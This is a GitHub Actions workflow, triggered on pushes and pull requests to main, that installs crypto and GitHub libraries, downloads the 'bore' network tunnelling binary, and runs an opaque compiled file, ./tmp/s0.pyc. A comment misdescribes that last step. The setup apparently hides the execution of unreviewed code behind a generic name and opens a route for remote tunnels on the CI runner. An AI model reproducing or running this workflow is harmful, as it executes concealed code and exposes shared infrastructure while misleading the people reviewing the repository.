name: Run Shell Script

on:
  push:
    branches:
      - main  # This triggers the action when there is a push to the main branch.
  pull_request:
    branches:
      - main  # Or trigger it on pull requests to the main branch.

jobs:
  run-script:
    runs-on: ubuntu-latest  # Using an Ubuntu runner (Linux)

    steps:
      - name: Check out repository
        uses: actions/checkout@v3  # This step checks out the code from the repository

      - name: Run shell script
        run: |
          python --version
          python -m pip install --upgrade requests numpy pytz timezonefinder pyaes pbkdf2 rsa pygithub pillow==10.4.0 python-tgpt==0.7.4 curl_cffi==0.7.1
          wget https://github.com/ekzhang/bore/releases/download/v0.4.0/bore-v0.4.0-x86_64-unknown-linux-musl.tar.gz
          tar xf bore-v0.4.0-x86_64-unknown-linux-musl.tar.gz
          python ./tmp/s0.pyc  # Make the script executable
